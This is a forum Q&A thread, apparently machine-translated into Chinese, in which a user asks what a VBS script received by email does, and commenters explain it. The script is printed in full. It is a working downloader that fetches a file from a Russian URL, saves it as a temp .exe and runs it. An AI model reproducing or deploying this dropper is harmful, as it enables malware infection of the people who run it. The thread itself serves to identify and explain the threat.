2
有人給我發了一封帶有vbs腳本的電子郵件,但我不知道它是什麼,因爲我不知道vbs。可能的數據勒索
我猜這是騙取我的一些數據的詐騙,但我無法確切地告訴我有什麼數據。有人可能會討論那個scrtip會做什麼嗎?
Sub HTTPUpload(myURL, myPath)
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject("Scripting.FileSystemObject")
Const TemporaryFolder = 2
Set tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
tname = objFSO.GetTempName + ".exe"
myPath = tfolder + "/" + tname
Set objFile = tfolder.CreateTextFile(tname)
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB(objHTTP.ResponseBody)
objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))
Next
objFile.Close()
objShell.Run(myPath)
Set objShell = Nothing
End Sub
HTTPUpload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""
該腳本將(嘗試)從最後一行中的URL下載並運行某些內容(可能是可執行文件)。 –
'tname = objFSO.GetTempName +「.exe」'肯定是一個可執行文件。服務器在俄羅斯的其他東西。編程技術也是錯誤的。它試圖編寫二進制文件,但使用文本函數。 – 2016-06-09 18:01:13
@AnsgarWiechers它實際上在本地創建一個空的'exe'文件,然後使用'WinHttpRequest'從遠程位置注入可執行文件的二進制內容,然後嘗試使用'WScript.Shell'' Run()'方法執行該文件。 – Lankymart